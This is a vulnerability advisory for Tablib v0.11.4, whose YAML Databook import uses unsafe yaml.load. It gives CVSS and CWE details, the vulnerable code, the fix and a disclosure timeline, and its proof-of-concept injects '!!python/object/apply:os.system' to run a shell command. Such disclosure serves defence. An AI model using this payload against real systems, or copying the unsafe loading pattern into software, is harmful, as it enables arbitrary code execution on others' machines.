Tablib Yaml Load Code Execution Vulnerability

Summary

An exploitable vulnerability exists in the Databook loading functionality of Tablib. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.

Tested Versions

Tablib v0.11.4

Product URLs

<https://pypi.python.org/pypi/tablib&gt;

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

Tablib is a Python dataset library used to agnostically generate various tabular formats from data. Tablib is also the main driver behind django-import-export application and library.

tablib/formats/_yaml.py:31
def import_book(dbook, in_stream):
	"""Returns databook from YAML stream."""

	dbook.wipe()

	for sheet in yaml.load(in_stream): [0]
		data = tablib.Dataset()
		data.title = sheet['title']
		data.dict = sheet['data']
		dbook.add_sheet(data)

Tablib is leveraging the unsafe API yaml.load [0] for importing the current yaml stream into to Databook… This yaml can contain a python directive to execute arbitrary commands.

Exploit Proof-of-Concept

A test leveraging the Tablib API shows the commands being executed:

(tablib) user in ~
In [1]: import tablib

In [2]: databook = tablib.Databook()

In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]')
AUTHORS         HISTORY.rst     MANIFEST.in     NOTICE          build           docs            tablib          test_tablib.py
HACKING         LICENSE         Makefile        README.rst      dist            setup.py        tablib.egg-info tox.ini

Mitigation

Replace yaml.load with yaml.safe_load

Timeline

2017-04-18 - Vendor Disclosure
2017-06-13 - Public Release